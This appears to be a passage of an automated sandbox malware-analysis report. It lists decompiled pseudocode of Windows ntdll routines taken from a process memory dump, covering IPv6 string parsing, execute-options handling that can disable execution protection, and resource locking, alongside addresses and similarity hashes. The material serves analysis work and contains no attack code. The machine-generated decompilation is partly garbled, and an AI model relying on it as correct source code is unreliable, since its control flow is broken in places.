                    0x020f13c2
                    0x020f1424
                    0x020f1424
                    0x020f1424
                    0x020f1427
                    0x020f142b
                    0x020f142c
                    0x020f142c
                    0x020f142c
                    0x00000000
                    0x020f141c
                    0x020f1411

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: ___swprintf_l
                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                    • API String ID: 48624451-2108815105
                    • Opcode ID: b8f5ab116968ede462a0007400573b9047fc11356d1e75fecad49d58ddd4233f
                    • Instruction ID: c1a6b597a33180271ea0272841204055d2878db5b809f9756e78bb10c450640b
                    • Opcode Fuzzy Hash: b8f5ab116968ede462a0007400573b9047fc11356d1e75fecad49d58ddd4233f
                    • Instruction Fuzzy Hash: 4D61E371D40759EADF65CF99C8909BEBBF5EF94300B14C12DEA9A46940D334A640EB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 020E7EFD, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 127COMMON
                    Download Yara Rule
                    C-Code - Quality: 64%
                    			E020E7EFD(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				char _v540;
				unsigned int _v544;
				signed int _v548;
				intOrPtr _v552;
				char _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t33;
				void* _t38;
				unsigned int _t46;
				unsigned int _t47;
				unsigned int _t52;
				intOrPtr _t56;
				unsigned int _t62;
				void* _t69;
				void* _t70;
				intOrPtr _t72;
				signed int _t73;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;

				_t33 =  *0x2192088; // 0x777117bf
				_v8 = _t33 ^ _t73;
				_v548 = _v548 & 0x00000000;
				_t72 = _a4;
				if(E020E7F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
					__eflags = _v548;
					if(_v548 == 0) {
						goto L1;
					}
					_t62 = _t72 + 0x24;
					E02103F92(0x55, 3, "CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions\n", _v548);
					_t71 = 0x214;
					_v544 = 0x214;
					E020BDFC0( &_v540, 0, 0x214);
					_t75 = _t74 + 0x20;
					_t46 =  *0x2194218( *((intOrPtr*)(_t72 + 0x28)),  *((intOrPtr*)(_t72 + 0x18)),  *((intOrPtr*)(_t72 + 0x20)), L"ExecuteOptions",  &_v556,  &_v540,  &_v544, _t62);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L1;
					}
					_t47 = _v544;
					__eflags = _t47;
					if(_t47 == 0) {
						goto L1;
					}
					__eflags = _t47 - 0x214;
					if(_t47 >= 0x214) {
						goto L1;
					}
					_push(_t62);
					 *((short*)(_t73 + (_t47 >> 1) * 2 - 0x21a)) = 0;
					E02103F92(0x55, 3, "CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database\n",  &_v540);
					_t52 = E020C0D27( &_v540, L"Execute=1");
					_t76 = _t75 + 0x1c;
					_push(_t62);
					__eflags = _t52;
					if(_t52 == 0) {
						E02103F92(0x55, 3, "CLIENT(ntdll): Processing %ws for patching section protection for %wZ\n",  &_v540);
						_t71 =  &_v540;
						_t56 = _t73 + _v544 - 0x218;
						_t77 = _t76 + 0x14;
						_v552 = _t56;
						__eflags = _t71 - _t56;
						if(_t71 >= _t56) {
							goto L1;
						} else {
							goto L10;
						}
						while(1) {
							L10:
							_t62 = E020C8375(_t71, 0x20);
							_pop(_t69);
							__eflags = _t62;
							if(__eflags != 0) {
								__eflags = 0;
								 *_t62 = 0;
							}
							E02103F92(0x55, 3, "CLIENT(ntdll): Processing section info %ws...\n", _t71);
							_t77 = _t77 + 0x10;
							E0212E8DB(_t69, _t70, __eflags, _t72, _t71);
							__eflags = _t62;
							if(_t62 == 0) {
								goto L1;
							}
							_t31 = _t62 + 2; // 0x2
							_t71 = _t31;
							__eflags = _t71 - _v552;
							if(_t71 >= _v552) {
								goto L1;
							}
						}
					}
					_push("CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ\n");
					_push(3);
					_push(0x55);
					E02103F92();
					_t38 = 1;
					L2:
					return E020BE1B4(_t38, _t62, _v8 ^ _t73, _t70, _t71, _t72);
				}
				L1:
				_t38 = 0;
				goto L2;
			}



























                    0x020e7f08
                    0x020e7f0f
                    0x020e7f12
                    0x020e7f1b
                    0x020e7f31
                    0x02103ead
                    0x02103eb4
                    0x00000000
                    0x00000000
                    0x02103eba
                    0x02103ecd
                    0x02103ed2
                    0x02103ee1
                    0x02103ee7
                    0x02103eec
                    0x02103f12
                    0x02103f18
                    0x02103f1a
                    0x00000000
                    0x00000000
                    0x02103f20
                    0x02103f26
                    0x02103f28
                    0x00000000
                    0x00000000
                    0x02103f2e
                    0x02103f30
                    0x00000000
                    0x00000000
                    0x02103f3a
                    0x02103f3b
                    0x02103f53
                    0x02103f64
                    0x02103f69
                    0x02103f6c
                    0x02103f6d
                    0x02103f6f
                    0x0210e304
                    0x0210e30f
                    0x0210e315
                    0x0210e31e
                    0x0210e321
                    0x0210e327
                    0x0210e329
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0210e32f
                    0x0210e32f
                    0x0210e337
                    0x0210e33a
                    0x0210e33b
                    0x0210e33d
                    0x0210e33f
                    0x0210e341
                    0x0210e341
                    0x0210e34e
                    0x0210e353
                    0x0210e358
                    0x0210e35d
                    0x0210e35f
                    0x00000000
                    0x00000000
                    0x0210e365
                    0x0210e365
                    0x0210e368
                    0x0210e36e
                    0x00000000
                    0x00000000
                    0x0210e374
                    0x0210e32f
                    0x02103f75
                    0x02103f7a
                    0x02103f7c
                    0x02103f7e
                    0x02103f86
                    0x020e7f39
                    0x020e7f47
                    0x020e7f47
                    0x020e7f37
                    0x020e7f37
                    0x00000000

                    APIs
                    • BaseQueryModuleData.KERNEL32(?,00000000,00000000,ExecuteOptions,?,?,?), ref: 02103F12
                    Strings
                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0210E2FB
                    • Execute=1, xrefs: 02103F5E
                    • ExecuteOptions, xrefs: 02103F04
                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 02103EC4
                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 02103F75
                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 02103F4A
                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 0210E345
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: BaseDataModuleQuery
                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                    • API String ID: 3901378454-484625025
                    • Opcode ID: b6cd7998fb5ca2f2ae6b156b77f09d9031a58bc4864ba47e491ddb04d473273e
                    • Instruction ID: 2e74d764a87bf4877062ed67944a844692905875f6a54130b674b7ae56a885d9
                    • Opcode Fuzzy Hash: b6cd7998fb5ca2f2ae6b156b77f09d9031a58bc4864ba47e491ddb04d473273e
                    • Instruction Fuzzy Hash: 9141C871A8031C7EEF21DA94DCC5FDBB3BDAF14704F0005A9E516E6090EB70AA859F65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 020F0B15, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 272COMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E020F0B15(intOrPtr* _a4, char _a7, intOrPtr* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				void* _t108;
				void* _t116;
				char _t120;
				short _t121;
				void* _t128;
				intOrPtr* _t130;
				char _t132;
				short _t133;
				intOrPtr _t141;
				signed int _t156;
				signed int _t174;
				intOrPtr _t177;
				intOrPtr* _t179;
				intOrPtr _t180;
				void* _t183;

				_t179 = _a4;
				_t141 =  *_t179;
				_v16 = 0;
				_v28 = 0;
				_v8 = 0;
				_v24 = 0;
				_v12 = 0;
				_v32 = 0;
				_v20 = 0;
				if(_t141 == 0) {
					L41:
					 *_a8 = _t179;
					_t180 = _v24;
					if(_t180 != 0) {
						if(_t180 != 3) {
							goto L6;
						}
						_v8 = _v8 + 1;
					}
					_t174 = _v32;
					if(_t174 == 0) {
						if(_v8 == 7) {
							goto L43;
						}
						goto L6;
					}
					L43:
					if(_v16 != 1) {
						if(_v16 != 2) {
							goto L6;
						}
						 *((short*)(_a12 + _v20 * 2)) = 0;
						L47:
						if(_t174 != 0) {
							E020C8980(_a12 + 0x10 + (_t174 - _v8) * 2, _a12 + _t174 * 2, _v8 - _t174 + _v8 - _t174);
							_t116 = 8;
							E020BDFC0(_a12 + _t174 * 2, 0, _t116 - _v8 + _t116 - _v8);
						}
						return 0;
					}
					if(_t180 != 0) {
						if(_v12 > 3) {
							goto L6;
						}
						_t120 = E020F0CFA(_v28, 0, 0xa);
						_t183 = _t183 + 0xc;
						if(_t120 > 0xff) {
							goto L6;
						}
						 *((char*)(_t180 + _v20 * 2 + _a12)) = _t120;
						goto L47;
					}
					if(_v12 > 4) {
						goto L6;
					}
					_t121 = E020F0CFA(_v28, _t180, 0x10);
					_t183 = _t183 + 0xc;
					 *((short*)(_a12 + _v20 * 2)) = _t121;
					goto L47;
				} else {
					while(1) {
						_t123 = _v16;
						if(_t123 == 0) {
							goto L7;
						}
						_t108 = _t123 - 1;
						if(_t108 != 0) {
							goto L1;
						}
						_t178 = _t141;
						if(E020F06BA(_t108, _t141) == 0 || _t135 == 0) {
							if(E020F06BA(_t135, _t178) == 0 || E020F0A5B(_t136, _t178) == 0) {
								if(_t141 != 0x3a) {
									if(_t141 == 0x2e) {
										if(_a7 != 0 || _v24 > 2 || _v8 > 6) {
											goto L41;
										} else {
											_v24 = _v24 + 1;
											L27:
											_v16 = _v16 & 0x00000000;
											L28:
											if(_v28 == 0) {
												goto L20;
											}
											_t177 = _v24;
											if(_t177 != 0) {
												if(_v12 > 3) {
													L6:
													return 0xc000000d;
												}
												_t132 = E020F0CFA(_v28, 0, 0xa);
												_t183 = _t183 + 0xc;
												if(_t132 > 0xff) {
													goto L6;
												}
												 *((char*)(_t177 + _v20 * 2 + _a12 - 1)) = _t132;
												goto L20;
											}
											if(_v12 > 4) {
												goto L6;
											}
											_t133 = E020F0CFA(_v28, 0, 0x10);
											_t183 = _t183 + 0xc;
											_v20 = _v20 + 1;
											 *((short*)(_a12 + _v20 * 2)) = _t133;
											goto L20;
										}
									}
									goto L41;
								}
								if(_v24 > 0 || _v8 > 6) {
									goto L41;
								} else {
									_t130 = _t179 + 1;
									if( *_t130 == _t141) {
										if(_v32 != 0) {
											goto L41;
										}
										_v32 = _v8 + 1;
										_t156 = 2;
										_v8 = _v8 + _t156;
										L34:
										_t179 = _t130;
										_v16 = _t156;
										goto L28;
									}
									_v8 = _v8 + 1;
									goto L27;
								}
							} else {
								_v12 = _v12 + 1;
								if(_v24 > 0) {
									goto L41;
								}
								_a7 = 1;
								goto L20;
							}
						} else {
							_v12 = _v12 + 1;
							L20:
							_t179 = _t179 + 1;
							_t141 =  *_t179;
							if(_t141 == 0) {
								goto L41;
							}
							continue;
						}
						L7:
						if(_t141 == 0x3a) {
							if(_v24 > 0 || _v8 > 0) {
								goto L41;
							} else {
								_t130 = _t179 + 1;
								if( *_t130 != _t141) {
									goto L41;
								}
								_v20 = _v20 + 1;
								_t156 = 2;
								_v32 = 1;
								_v8 = _t156;
								 *((short*)(_a12 + _v20 * 2)) = 0;
								goto L34;
							}
						}
						L8:
						if(_v8 > 7) {
							goto L41;
						}
						_t142 = _t141;
						if(E020F06BA(_t123, _t141) == 0 || _t124 == 0) {
							if(E020F06BA(_t124, _t142) == 0 || E020F0A5B(_t125, _t142) == 0 || _v24 > 0) {
								goto L41;
							} else {
								_t128 = 1;
								_a7 = 1;
								_v28 = _t179;
								_v16 = 1;
								_v12 = 1;
								L39:
								if(_v16 == _t128) {
									goto L20;
								}
								goto L28;
							}
						} else {
							_a7 = 0;
							_v28 = _t179;
							_v16 = 1;
							_v12 = 1;
							goto L20;
						}
					}
				}
				L1:
				_t123 = _t108 == 1;
				if(_t108 == 1) {
					goto L8;
				}
				_t128 = 1;
				goto L39;
			}

























                    0x020f0b21
                    0x020f0b24
                    0x020f0b27
                    0x020f0b2a
                    0x020f0b2d
                    0x020f0b30
                    0x020f0b33
                    0x020f0b36
                    0x020f0b39
                    0x020f0b3e
                    0x020f0c65
                    0x020f0c68
                    0x020f0c6a
                    0x020f0c6f
                    0x0211eb42
                    0x00000000
                    0x00000000
                    0x0211eb48
                    0x0211eb48
                    0x020f0c75
                    0x020f0c7a
                    0x0211eb54
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0211eb5a
                    0x020f0c80
                    0x020f0c84
                    0x0211eb98
                    0x00000000
                    0x00000000
                    0x0211eba6
                    0x020f0cb8
                    0x020f0cba
                    0x020f0cd3
                    0x020f0cda
                    0x020f0ce4
                    0x020f0ce9
                    0x00000000
                    0x020f0cec
                    0x020f0c8c
                    0x0211eb63
                    0x00000000
                    0x00000000
                    0x0211eb70
                    0x0211eb75
                    0x0211eb7d
                    0x00000000
                    0x00000000
                    0x0211eb8c
                    0x00000000
                    0x0211eb8c
                    0x020f0c96
                    0x00000000
                    0x00000000
                    0x020f0ca2
                    0x020f0cac
                    0x020f0cb4
                    0x00000000
                    0x00000000
                    0x020f0b44
                    0x020f0b47
                    0x020f0b49
                    0x00000000
                    0x00000000
                    0x020f0b4f
                    0x020f0b50
                    0x00000000
                    0x00000000
                    0x020f0b56
                    0x020f0b62
                    0x020f0b7c
                    0x020f0bac
                    0x020f0a0f
                    0x0211eaaa
                    0x00000000
                    0x0211eac4
                    0x0211eac4
                    0x020f0bd0
                    0x020f0bd0
                    0x020f0bd4
                    0x020f0bd9
                    0x00000000
                    0x00000000
                    0x020f0bdb
                    0x020f0be0
                    0x0211eb0e
                    0x020f0a1a
                    0x00000000
                    0x020f0a1a
                    0x0211eb1a
                    0x0211eb1f
                    0x0211eb27
                    0x00000000
                    0x00000000
                    0x0211eb36
                    0x00000000
                    0x0211eb36
                    0x020f0bea
                    0x00000000
                    0x00000000
                    0x020f0bf6
                    0x020f0c00
                    0x020f0c03
                    0x020f0c0b
                    0x00000000
                    0x020f0c0b
                    0x0211eaaa
                    0x00000000
                    0x020f0a15
                    0x020f0bb6
                    0x00000000
                    0x020f0bc6
                    0x020f0bc6
                    0x020f0bcb
                    0x020f0c15
                    0x00000000
                    0x00000000
                    0x020f0c1d
                    0x020f0c20
                    0x020f0c21
                    0x020f0c24
                    0x020f0c24
                    0x020f0c26
                    0x00000000
                    0x020f0c26
                    0x020f0bcd
                    0x00000000
                    0x020f0bcd
                    0x020f0b89
                    0x020f0b89
                    0x020f0b90
                    0x00000000
                    0x00000000
                    0x020f0b96
                    0x00000000
                    0x020f0b96
                    0x020f0a04
                    0x020f0a04
                    0x020f0b9a
                    0x020f0b9a
                    0x020f0b9b
                    0x020f0b9f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x020f0ba5
                    0x020f0ac7
                    0x020f0aca
                    0x0211eacf
                    0x00000000
                    0x0211eade
                    0x0211eade
                    0x0211eae3
                    0x00000000
                    0x00000000
                    0x0211eaf3
                    0x0211eaf6
                    0x0211eaf7
                    0x0211eafe
                    0x0211eb01
                    0x00000000
                    0x0211eb01
                    0x0211eacf
                    0x020f0ad0
                    0x020f0ad4
                    0x00000000
                    0x00000000
                    0x020f0ada
                    0x020f0ae6
                    0x020f0c34
                    0x00000000
                    0x020f0c47
                    0x020f0c49
                    0x020f0c4a
                    0x020f0c4e
                    0x020f0c51
                    0x020f0c54
                    0x020f0c57
                    0x020f0c5a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x020f0c60
                    0x020f0afb
                    0x020f0afe
                    0x020f0b02
                    0x020f0b05
                    0x020f0b08
                    0x00000000
                    0x020f0b08
                    0x020f0ae6
                    0x020f0b44
                    0x020f09f8
                    0x020f09f8
                    0x020f09f9
                    0x00000000
                    0x00000000
                    0x0211eaa0
                    0x00000000

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.2382241945.00000000020A0000.00000040.00000001.sdmp, Offset: 02090000, based on PE: true
                    • Associated: 00000009.00000002.2382237043.0000000002090000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382418114.0000000002180000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382421824.0000000002190000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382427541.0000000002194000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382432925.0000000002197000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382436850.00000000021A0000.00000040.00000001.sdmp Download File
                    • Associated: 00000009.00000002.2382486661.0000000002200000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: __fassign
                    • String ID: .$:$:
                    • API String ID: 3965848254-2308638275
                    • Opcode ID: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                    • Instruction ID: c5d56884104f9ae7a5ac78f71af82edcdb178524a845c2e07e25239df6a88aee
                    • Opcode Fuzzy Hash: b15de34944a390e3fa5e98378680e2de18144008d38fd4e6897fe19ea25b26ab
                    • Instruction Fuzzy Hash: 34A1D371D8030ADFCFA5CF54C8447BEB7B7AF44308F24846ADA06A7A4AD7305645EB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 020F0554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                    Download Yara Rule
                    C-Code - Quality: 50%
                    			E020F0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x021901c0;
									_push(_t144);
									_push(0);
									_t51 = E020AF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = E020F4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									E02103F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									E02103F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0213217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E02103F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E020F3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x021901c0;
												_push(_t138);
												_push(0);
												_t58 = E020AF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = E020F4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												E02103F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												E02103F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0213217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												E02103F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E020F3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E020D5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E020AF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E020F3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E020AF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E020F3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E020AF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E020F3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E020D5329(_t110, _t138);
																_t69 = E020D53A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                    0x020f055a
                    0x020f055d
                    0x020f0563
                    0x020f0566
                    0x020f05d8
                    0x020f05e2
                    0x020f05e5
                    0x00000000
                    0x020f05e7
                    0x020f05e7
                    0x020f05ea
                    0x020f05f3
                    0x020f05f3
                    0x020f0568
                    0x020f0568
                    0x020f0568
                    0x020f0569
                    0x020f0569
                    0x020f0569
                    0x020f056b
                    0x00000000
                    0x00000000
                    0x0211217f
                    0x02112183
                    0x0211225b
                    0x0211225f
                    0x02112189
                    0x0211218c
                    0x0211218f
                    0x02112194
                    0x02112199
                    0x0211219d
                    0x021121a0
                    0x021121a2
                    0x021121ce
                    0x021121ce
                    0x021121ce
                    0x021121d0
                    0x021121d6
                    0x021121de
                    0x021121e2
                    0x021121e8
                    0x021121e9
                    0x021121ec
                    0x021121f1
                    0x021121f6
                    0x00000000
                    0x00000000
                    0x021121f8
                    0x021121fb
                    0x02112206
                    0x0211220b
                    0x0211220c
                    0x02112217
                    0x02112226
                    0x0211222b
                    0x0211222c
                    0x0211222f
                    0x02112232
                    0x02112235
                    0x02112235
                    0x0211223a
                    0x0211223f
                    0x02112241
                    0x02112243
                    0x02112248
                    0x02112248
                    0x0211224d
                    0x0211224f
                    0x02112262
                    0x02112263
                    0x02112268
                    0x02112269
                    0x02112269
                    0x02112269
                    0x0211226d
                    0x00000000
                    0x00000000
                    0x02112276
                    0x02112279
                    0x0211227e
                    0x02112283
                    0x02112287
                    0x0211228a
                    0x0211228d
                    0x0211228f
                    0x021122bc
                    0x021122bc
                    0x021122bc
                    0x021122be
                    0x021122c4
                    0x021122cc
                    0x021122d0
                    0x021122d6
                    0x021122d7
                    0x021122da
                    0x021122df
                    0x021122e4
                    0x00000000
                    0x00000000
                    0x021122e6
                    0x021122e9
                    0x021122f4
                    0x021122f9
                    0x021122fa
                    0x02112305
                    0x02112314
                    0x02112319
                    0x0211231a
                    0x0211231d
                    0x02112320
                    0x02112323
                    0x02112323
                    0x02112328
                    0x0211232d
                    0x0211232f
                    0x02112331
                    0x02112336
                    0x02112336
                    0x0211233b
                    0x0211233d
                    0x02112350
                    0x02112351
                    0x02112356
                    0x02112359
                    0x02112359
                    0x0211235b
                    0x0211235d
                    0x020d5367
                    0x020d536b
                    0x020d5372
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x02112363
                    0x02112363
                    0x02112369
